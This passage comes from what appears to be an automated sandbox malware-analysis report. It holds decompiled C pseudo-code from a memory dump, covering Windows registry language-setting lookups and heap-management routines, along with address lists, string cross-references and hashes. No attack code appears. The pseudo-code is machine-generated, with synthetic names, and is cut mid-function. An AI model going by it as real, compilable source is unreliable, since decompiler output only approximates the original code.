								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = E33CEDAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(L33DAAD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_t160 = 4;
							}
						}
						_push(_v160);
						L33D32A80();
						_v164 = _v164 & 0x00000000;
						_t184 = 0x18;
					}
					_t170 = 0x2000000;
					if(E33CED736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E33D35050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = L33D32AB0();
						}
						if(_t128 < 0) {
							E33D35050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = L33D32AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E33D35050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_t164 = 0x40;
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(L33D32AB0() >= 0) {
							_t170 = _v144;
							_t182 = L33DAADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_t184 = 0x18;
						}
						E33D35050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = L33D32AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = E33CED9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}





















































                                                                                                                                                                                            0x33ced035
                                                                                                                                                                                            0x33ced03f
                                                                                                                                                                                            0x33ced042
                                                                                                                                                                                            0x33ced044
                                                                                                                                                                                            0x33ced048
                                                                                                                                                                                            0x33ced04c
                                                                                                                                                                                            0x33ced050
                                                                                                                                                                                            0x33ced056
                                                                                                                                                                                            0x33d4a5a1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced065
                                                                                                                                                                                            0x33ced067
                                                                                                                                                                                            0x33ced075
                                                                                                                                                                                            0x33ced07c
                                                                                                                                                                                            0x33ced081
                                                                                                                                                                                            0x33ced085
                                                                                                                                                                                            0x33ced08f
                                                                                                                                                                                            0x33ced093
                                                                                                                                                                                            0x33ced094
                                                                                                                                                                                            0x33ced09d
                                                                                                                                                                                            0x33ced0a5
                                                                                                                                                                                            0x33ced0a6
                                                                                                                                                                                            0x33ced0aa
                                                                                                                                                                                            0x33ced0b5
                                                                                                                                                                                            0x33d4a52a
                                                                                                                                                                                            0x33d4a52e
                                                                                                                                                                                            0x33ced194
                                                                                                                                                                                            0x33ced199
                                                                                                                                                                                            0x33ced19b
                                                                                                                                                                                            0x33ced19f
                                                                                                                                                                                            0x33ced19f
                                                                                                                                                                                            0x33ced1a9
                                                                                                                                                                                            0x33d4a5ab
                                                                                                                                                                                            0x33d4a5af
                                                                                                                                                                                            0x33d4a5af
                                                                                                                                                                                            0x33ced1b4
                                                                                                                                                                                            0x33ced1b6
                                                                                                                                                                                            0x33ced1ba
                                                                                                                                                                                            0x33ced1ba
                                                                                                                                                                                            0x33ced1c1
                                                                                                                                                                                            0x33d4a5bb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a5c1
                                                                                                                                                                                            0x33d4a5c7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a5d0
                                                                                                                                                                                            0x33d4a5df
                                                                                                                                                                                            0x33d4a5df
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced1c7
                                                                                                                                                                                            0x33ced1ca
                                                                                                                                                                                            0x33ced1de
                                                                                                                                                                                            0x33ced1e6
                                                                                                                                                                                            0x33ced1e6
                                                                                                                                                                                            0x33ced1cf
                                                                                                                                                                                            0x33ced1d4
                                                                                                                                                                                            0x33ced1d8
                                                                                                                                                                                            0x33d4a5e6
                                                                                                                                                                                            0x33d4a5ea
                                                                                                                                                                                            0x33d4a5ef
                                                                                                                                                                                            0x33d4a5ef
                                                                                                                                                                                            0x33d4a5ef
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced1d8
                                                                                                                                                                                            0x33ced1c1
                                                                                                                                                                                            0x33d4a537
                                                                                                                                                                                            0x33d4a541
                                                                                                                                                                                            0x33d4a54d
                                                                                                                                                                                            0x33d4a558
                                                                                                                                                                                            0x33d4a558
                                                                                                                                                                                            0x33d4a54d
                                                                                                                                                                                            0x33d4a559
                                                                                                                                                                                            0x33d4a55d
                                                                                                                                                                                            0x33d4a562
                                                                                                                                                                                            0x33d4a569
                                                                                                                                                                                            0x33d4a569
                                                                                                                                                                                            0x33ced0bf
                                                                                                                                                                                            0x33ced0cc
                                                                                                                                                                                            0x33d4a56f
                                                                                                                                                                                            0x33d4a56f
                                                                                                                                                                                            0x33ced0d5
                                                                                                                                                                                            0x33ced1ec
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced1fc
                                                                                                                                                                                            0x33ced2de
                                                                                                                                                                                            0x33ced202
                                                                                                                                                                                            0x33ced20c
                                                                                                                                                                                            0x33ced215
                                                                                                                                                                                            0x33ced21a
                                                                                                                                                                                            0x33ced222
                                                                                                                                                                                            0x33ced22a
                                                                                                                                                                                            0x33ced232
                                                                                                                                                                                            0x33ced23d
                                                                                                                                                                                            0x33ced23e
                                                                                                                                                                                            0x33ced247
                                                                                                                                                                                            0x33ced24e
                                                                                                                                                                                            0x33ced24f
                                                                                                                                                                                            0x33ced25a
                                                                                                                                                                                            0x33ced25a
                                                                                                                                                                                            0x33ced261
                                                                                                                                                                                            0x33ced26d
                                                                                                                                                                                            0x33ced272
                                                                                                                                                                                            0x33ced27b
                                                                                                                                                                                            0x33ced283
                                                                                                                                                                                            0x33ced28b
                                                                                                                                                                                            0x33ced293
                                                                                                                                                                                            0x33ced2a1
                                                                                                                                                                                            0x33ced2a2
                                                                                                                                                                                            0x33ced2ab
                                                                                                                                                                                            0x33ced2b2
                                                                                                                                                                                            0x33ced2b3
                                                                                                                                                                                            0x33ced2c3
                                                                                                                                                                                            0x33ced2c7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced2e5
                                                                                                                                                                                            0x33ced2c7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced0db
                                                                                                                                                                                            0x33ced0e0
                                                                                                                                                                                            0x33ced192
                                                                                                                                                                                            0x33ced192
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced192
                                                                                                                                                                                            0x33ced0f0
                                                                                                                                                                                            0x33ced0f9
                                                                                                                                                                                            0x33ced0fe
                                                                                                                                                                                            0x33ced103
                                                                                                                                                                                            0x33ced10d
                                                                                                                                                                                            0x33ced10e
                                                                                                                                                                                            0x33ced116
                                                                                                                                                                                            0x33ced117
                                                                                                                                                                                            0x33ced120
                                                                                                                                                                                            0x33ced124
                                                                                                                                                                                            0x33ced125
                                                                                                                                                                                            0x33ced130
                                                                                                                                                                                            0x33d4a580
                                                                                                                                                                                            0x33d4a58f
                                                                                                                                                                                            0x33d4a593
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a59b
                                                                                                                                                                                            0x33d4a59b
                                                                                                                                                                                            0x33ced140
                                                                                                                                                                                            0x33ced149
                                                                                                                                                                                            0x33ced14e
                                                                                                                                                                                            0x33ced153
                                                                                                                                                                                            0x33ced158
                                                                                                                                                                                            0x33ced160
                                                                                                                                                                                            0x33ced168
                                                                                                                                                                                            0x33ced169
                                                                                                                                                                                            0x33ced172
                                                                                                                                                                                            0x33ced176
                                                                                                                                                                                            0x33ced177
                                                                                                                                                                                            0x33ced180
                                                                                                                                                                                            0x33ced184
                                                                                                                                                                                            0x33ced2c9
                                                                                                                                                                                            0x33ced2d7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced18a
                                                                                                                                                                                            0x33ced18a
                                                                                                                                                                                            0x33ced190
                                                                                                                                                                                            0x33ced190
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced190
                                                                                                                                                                                            0x33ced184
                                                                                                                                                                                            0x33ced0d5

                                                                                                                                                                                            Strings
                                                                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 33CED263
                                                                                                                                                                                            • @, xrefs: 33CED2B3
                                                                                                                                                                                            • @, xrefs: 33CED09D
                                                                                                                                                                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 33CED0E6
                                                                                                                                                                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 33CED202
                                                                                                                                                                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 33CED136
                                                                                                                                                                                            • @, xrefs: 33CED24F
                                                                                                                                                                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 33CED06F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                            • API String ID: 0-1356375266
                                                                                                                                                                                            • Opcode ID: e300b793a5238947c939025bb03c67afd07c9732183e6bc62e9aeadf1c593a08
                                                                                                                                                                                            • Instruction ID: 22be1852c2d6ad7b253aa6029fcf643047c5416f17ce4aaeac1b31e8716e02c3
                                                                                                                                                                                            • Opcode Fuzzy Hash: e300b793a5238947c939025bb03c67afd07c9732183e6bc62e9aeadf1c593a08
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5EA17AB59083459FE321CF20C554B9BB7E8BF84766F00492EF988D6240EB75D948CFA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D9F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                            • API String ID: 0-2224505338
                                                                                                                                                                                            • Opcode ID: c3b5e2865a048c2d4c06a3d271f779fdb16e1ca4945a2e379da3e92ab6cc0773
                                                                                                                                                                                            • Instruction ID: 35d5d3aad08513b09b726075b9c170c5a3e569fa88785bb2a8a5dd6e914003e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: c3b5e2865a048c2d4c06a3d271f779fdb16e1ca4945a2e379da3e92ab6cc0773
                                                                                                                                                                                            • Instruction Fuzzy Hash: 25511037912785EFE341DFA4C884EAA77F8EB04B62F168599F444DF622CA71E940CA10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMONCrypto
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                            			E33CEF113(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t242;
				signed char _t243;
				signed short _t245;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t255;
				signed int _t265;
				signed int _t274;
				signed int _t277;
				intOrPtr _t278;
				signed int _t279;
				signed int _t302;
				signed short _t308;
				intOrPtr _t312;
				signed int _t323;
				signed int _t328;
				signed int _t331;
				intOrPtr _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				intOrPtr _t341;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t378;
				signed short _t386;
				intOrPtr _t388;
				intOrPtr _t399;
				unsigned int _t415;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t439;
				signed short _t440;
				signed short _t443;
				signed int _t447;
				signed short* _t453;
				void* _t461;
				signed int _t472;
				signed int _t473;
				signed int _t475;
				intOrPtr _t476;
				signed int _t483;
				void* _t485;
				signed short _t496;
				unsigned int _t502;
				unsigned int _t504;
				signed int _t509;
				signed int _t514;
				signed short* _t524;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				unsigned int _t545;
				signed int _t547;

				_t444 = __ecx;
				_t547 = __ecx;
				_t533 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x33de6d48) != 0) {
					_push(_a4);
					_t509 = __edx;
					L11:
					_t242 = L33D00B10(_t444, _t509);
					L7:
					return _t242;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x240)) =  *((intOrPtr*)(__ecx + 0x240)) - 1;
						_t424 = E33CEF858(__edx,  &_v12,  &_v16);
						__eflags = _t424;
						if(_t424 != 0) {
							_t135 = _t547 + 0x244;
							 *_t135 =  *(_t547 + 0x244) - _v16;
							__eflags =  *_t135;
						}
					}
					_t439 = _a4;
					_t509 = _t533;
					_v44 = _t533;
					L14:
					_t243 =  *((intOrPtr*)(_t533 + 6));
					__eflags = _t243;
					if(_t243 == 0) {
						_t535 = _t547;
					} else {
						_t535 = (_t533 & 0xffff0000) - ((_t243 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t535;
					}
					_t245 = 7 + _t439 * 8 + _t509;
					_v12 = _t245;
					__eflags =  *_t245 - 3;
					if( *_t245 == 3) {
						_v16 = _t509 + _t439 * 8 + 8;
						E33CE9E69(_t547, _t509 + _t439 * 8 + 8);
						_t496 = _v16;
						_v28 =  *(_t496 + 0x10);
						 *((intOrPtr*)(_t535 + 0x30)) =  *((intOrPtr*)(_t535 + 0x30)) - 1;
						_v36 =  *(_t496 + 0x14);
						 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) - ( *(_t496 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) +  *(_t496 + 0x14);
						 *((intOrPtr*)(_t547 + 0x208)) =  *((intOrPtr*)(_t547 + 0x208)) - 1;
						_t415 =  *(_t496 + 0x14);
						__eflags = _t415 - 0x7f000;
						if(_t415 >= 0x7f000) {
							 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t415;
							_t415 =  *(_t496 + 0x14);
						}
						_t509 = _v44;
						_t439 = _t439 + (_t415 >> 3) + 0x20;
						__eflags = 1;
						_a4 = _t439;
						_v40 = 1;
					} else {
						_v36 = _v36 & 0x00000000;
					}
					__eflags =  *((intOrPtr*)(_t547 + 0x54)) -  *((intOrPtr*)(_t509 + 4));
					if( *((intOrPtr*)(_t547 + 0x54)) ==  *((intOrPtr*)(_t509 + 4))) {
						_v48 = _t509;
						_t247 = E33CEBF92(_t535, _t509);
						__eflags = _a8;
						_v32 = _t247;
						if(_a8 != 0) {
							__eflags = _t247;
							if(_t247 == 0) {
								goto L20;
							}
						}
						__eflags =  *0x33de6960 - 1;
						if( *0x33de6960 >= 1) {
							__eflags = _t247;
							if(_t247 == 0) {
								_t399 =  *[fs:0x30];
								__eflags =  *(_t399 + 0xc);
								if( *(_t399 + 0xc) == 0) {
									_push("HEAP: ");
									E33CEB910();
								} else {
									E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E33CEB910();
								__eflags =  *0x33de5da8;
								if( *0x33de5da8 == 0) {
									__eflags = 0;
									E33DAFC95(_t439, 1, _t535, 0);
								}
								_t509 = _v44;
								_t439 = _a4;
							}
						}
						_t334 = _v40;
						_t472 = _t439 << 3;
						_v20 = _t472;
						_t473 = _t472 + _t509;
						_v24 = _t473;
						__eflags = _t334;
						if(_t334 == 0) {
							_t473 = _t473 + 0xfffffff0;
						}
						_t475 = (_t473 & 0xfffff000) - _v48;
						__eflags = _t475;
						_v52 = _t475;
						if(_t475 == 0) {
							__eflags =  *0x33de6960 - 1;
							if( *0x33de6960 < 1) {
								goto L9;
							}
							__eflags = _t334;
							L147:
							if(__eflags == 0) {
								goto L9;
							}
							_t255 =  *[fs:0x30];
							__eflags =  *(_t255 + 0xc);
							if( *(_t255 + 0xc) == 0) {
								_push("HEAP: ");
								E33CEB910();
							} else {
								E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E33CEB910();
							__eflags =  *0x33de5da8;
							if( *0x33de5da8 == 0) {
								__eflags = 0;
								E33DAFC95(_t439, 1, _t535, 0);
							}
							goto L153;
						} else {
							_t336 = E33CEFABA( &_v48,  &_v52, 0x4000);
							__eflags = _t336;
							if(_t336 < 0) {
								L90:
								 *((intOrPtr*)(_t547 + 0x220)) =  *((intOrPtr*)(_t547 + 0x220)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									L154:
									_t509 = _v44;
									L9:
									_t444 = _t547;
									L10:
									_push(_t439);
									goto L11;
								}
								L33D0096B(_t547, _t535, _v28 + 0xffffffe8, _v36, _v44,  &_a4);
								L153:
								_t439 = _a4;
								goto L154;
							}
							_t337 = E33D03C40();
							_t441 = 0x7ffe0380;
							__eflags = _t337;
							if(_t337 != 0) {
								_t340 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t340 = 0x7ffe0380;
							}
							__eflags =  *_t340;
							if( *_t340 != 0) {
								_t341 =  *[fs:0x30];
								__eflags =  *(_t341 + 0x240) & 0x00000001;
								if(( *(_t341 + 0x240) & 0x00000001) != 0) {
									E33DAF13E(_t441, _t547, _v48, _v52, 5);
								}
							}
							_t342 = _v32;
							 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
							_t476 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t476 - 0x7f000;
							if(_t476 >= 0x7f000) {
								 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t476;
							}
							E33CE9E69(_t547, _t342);
							_t478 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E33CEB9F6(_t547, _t478);
							 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) - _v52;
							_t350 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t350 - 0x7f000;
							if(_t350 >= 0x7f000) {
								_t123 = _t547 + 0x1fc;
								 *_t123 =  *(_t547 + 0x1fc) + _t350;
								__eflags =  *_t123;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t524 = _v52 + _v48;
								_v32 = _t524;
								_t524[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v24 - _v52 + _v48;
								if(_v24 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t524[1] = _t524[1] ^ _t524[0] ^  *_t524;
										 *_t524 =  *_t524 ^  *(_t547 + 0x50);
									}
								} else {
									_t443 = 0;
									_t524[3] = 0;
									_t524[1] = 0;
									_t378 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t483 = _t378;
									 *_t524 = _t378;
									__eflags =  *0x33de6960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t483 - 1;
										if(_t483 <= 1) {
											_t388 =  *[fs:0x30];
											__eflags =  *(_t388 + 0xc);
											if( *(_t388 + 0xc) == 0) {
												_push("HEAP: ");
												E33CEB910();
											} else {
												E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E33CEB910();
											__eflags =  *0x33de5da8 - _t443; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E33DAFC95(_t443, 1, _t535, 0);
											}
											_t524 = _v32;
										}
									}
									_t524[1] = _t443;
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t386 = (_t524 - _t535 >> 0x10) + 1;
										_v16 = _t386;
										__eflags = _t386 - 0xfe;
										if(_t386 >= 0xfe) {
											_push(_t443);
											_push(_t443);
											_push(_t535);
											_push(_t524);
											_t485 = 3;
											E33DB5FED(_t485,  *((intOrPtr*)(_t535 + 0x18)));
											_t524 = _v48;
											_t386 = _v32;
										}
										_t443 = _t386;
									}
									_t524[3] = _t443;
									L33D00B10(_t547, _t524,  *_t524 & 0x0000ffff);
									_t441 = 0x7ffe0380;
								}
							}
							_t354 = E33D03C40();
							__eflags = _t354;
							if(_t354 != 0) {
								_t357 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t357 = _t441;
							}
							__eflags =  *_t357;
							if( *_t357 != 0) {
								_t358 =  *[fs:0x30];
								__eflags =  *(_t358 + 0x240) & 1;
								if(( *(_t358 + 0x240) & 1) != 0) {
									__eflags = E33D03C40();
									if(__eflags != 0) {
										_t441 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E33DAF058(_t441, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _v40, _v36,  *_t441 & 0x000000ff);
								}
							}
							_t359 = E33D03C40();
							_t540 = 0x7ffe038a;
							_t440 = 0x230;
							__eflags = _t359;
							if(_t359 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 != 0) {
								__eflags = E33D03C40();
								if(__eflags != 0) {
									_t540 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t440;
									__eflags = _t540;
								}
								_push( *_t540 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								L123:
								_push( *(_t547 + 0x74) << 3);
								_push(_v52);
								_t242 = E33DAF058(_t440, _t547, _v48, __eflags);
							}
							goto L7;
						}
					}
					L20:
					_t447 = _t509 + 0x0000101f & 0xfffff000;
					_v48 = _t447;
					__eflags = _t447 - _t509 + 0x28;
					if(_t447 == _t509 + 0x28) {
						_t447 = _t447 + 0x1000;
						_v48 = _t447;
					}
					_t250 = _t439 << 3;
					_v24 = _t250;
					_t251 = _t250 + _t509;
					__eflags = _v40;
					_v20 = _t251;
					if(_v40 == 0) {
						_t251 = _t251 + 0xfffffff0;
					}
					_t252 = _t251 & 0xfffff000;
					__eflags = _t252 - _t447;
					if(_t252 < _t447) {
						__eflags =  *0x33de6960 - 1; // 0x0
						if(__eflags < 0) {
							goto L9;
						}
						__eflags = _v40;
						goto L147;
					}
					_t265 = _t252 - _t447;
					__eflags = _a8;
					_v52 = _t265;
					if(_a8 != 0) {
						L25:
						__eflags = _t265;
						if(_t265 == 0) {
							L31:
							_t440 = 0;
							__eflags = _v40;
							if(_v40 == 0) {
								_t453 = _v48 + _v52;
								_v36 = _t453;
								_t453[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v20 - _v52 + _v48;
								if(_v20 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t453[1] = _t453[1] ^ _t453[0] ^  *_t453;
										 *_t453 =  *_t453 ^  *(_t547 + 0x50);
									}
								} else {
									_t453[3] = 0;
									_t453[1] = 0;
									_t302 = _v24 - _v52 - _v48 + _t509 >> 0x00000003 & 0x0000ffff;
									_t514 = _t302;
									 *_t453 = _t302;
									__eflags =  *0x33de6960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t514 - 1;
										if(_t514 <= 1) {
											_t312 =  *[fs:0x30];
											__eflags =  *(_t312 + 0xc);
											if( *(_t312 + 0xc) == 0) {
												_push("HEAP: ");
												E33CEB910();
											} else {
												E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("(LONG)FreeEntry->Size > 1");
											E33CEB910();
											__eflags =  *0x33de5da8 - _t440; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E33DAFC95(_t440, 1, _t535, 0);
											}
											_t453 = _v36;
										}
									}
									_t453[1] = _t440;
									_t515 =  *((intOrPtr*)(_t535 + 0x18));
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t308 = (_t453 - _t535 >> 0x10) + 1;
										_v12 = _t308;
										__eflags = _t308 - 0xfe;
										if(_t308 >= 0xfe) {
											_push(_t440);
											_push(_t440);
											_push(_t535);
											_push(_t453);
											_t461 = 3;
											E33DB5FED(_t461, _t515);
											_t453 = _v52;
											_t308 = _v28;
										}
									} else {
										_t308 = _t440;
									}
									_t453[3] = _t308;
									L33D00B10(_t547, _t453,  *_t453 & 0x0000ffff);
								}
							}
							L33D0096B(_t547, _t535, _v48 + 0xffffffe8, _v52, _v44,  &_v8);
							L33D00B10(_t547, _v60, _v24);
							_t274 = E33D03C40();
							_t536 = 0x7ffe0380;
							__eflags = _t274;
							if(_t274 != 0) {
								_t277 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t277 = 0x7ffe0380;
							}
							__eflags =  *_t277;
							if( *_t277 != 0) {
								_t278 =  *[fs:0x30];
								__eflags =  *(_t278 + 0x240) & 1;
								if(( *(_t278 + 0x240) & 1) != 0) {
									__eflags = E33D03C40();
									if(__eflags != 0) {
